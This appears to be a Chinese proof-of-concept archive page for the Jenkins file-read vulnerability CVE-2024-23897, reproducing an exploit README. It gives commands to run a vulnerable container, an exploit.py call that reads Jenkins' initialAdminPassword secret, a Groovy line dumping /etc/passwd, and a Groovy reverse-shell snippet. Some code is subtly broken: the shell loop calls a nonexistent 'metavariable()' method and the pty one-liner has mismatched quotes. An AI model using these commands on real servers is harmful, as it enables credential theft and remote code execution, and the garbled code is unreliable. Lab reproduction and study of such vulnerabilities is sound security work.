关联漏洞
标题:Jenkins 安全漏洞 (CVE-2024-23897)描述:Jenkins是Jenkins开源的一个应用软件。一个开源自动化服务器Jenkins提供了数百个插件来支持构建,部署和自动化任何项目。 Jenkins 2.441及之前版本、LTS 2.426.2及之前版本存在安全漏洞,该漏洞源于允许未经身份验证的攻击者读取Jenkins控制器文件系统。
介绍
# Exploit-CVE-2024-23897
# Run the Container
docker run -p 8080:8080 --name vulnerable-jenkins -d jenkins/jenkins:2.441-jdk17
# Check logs
docker logs <machine_name>
# Fetch docker machines IP:
docker inspect vulnerable-jenkins | grep IPAddress
#Exploitation Code:
python3 exploit.py --target http://127.0.0.1:8080 --file /var/jenkins_home/secrets/initialAdminPassword --request-timeout 30
# Groovy Script:
println "cat /etc/passwd".execute().text
# RCE
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(metavariable()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
# To set environmental variables
export TERM=xterm
#For interactive shell
python -c 'import pty'; pty.spawn("/bin/bash")'
文件快照
[4.0K] /data/pocs/f376479b9ae5282db46d9fef2b331979f9f036e0
├── [6.1K] exploit.py
└── [1.1K] README.md
1 directory, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。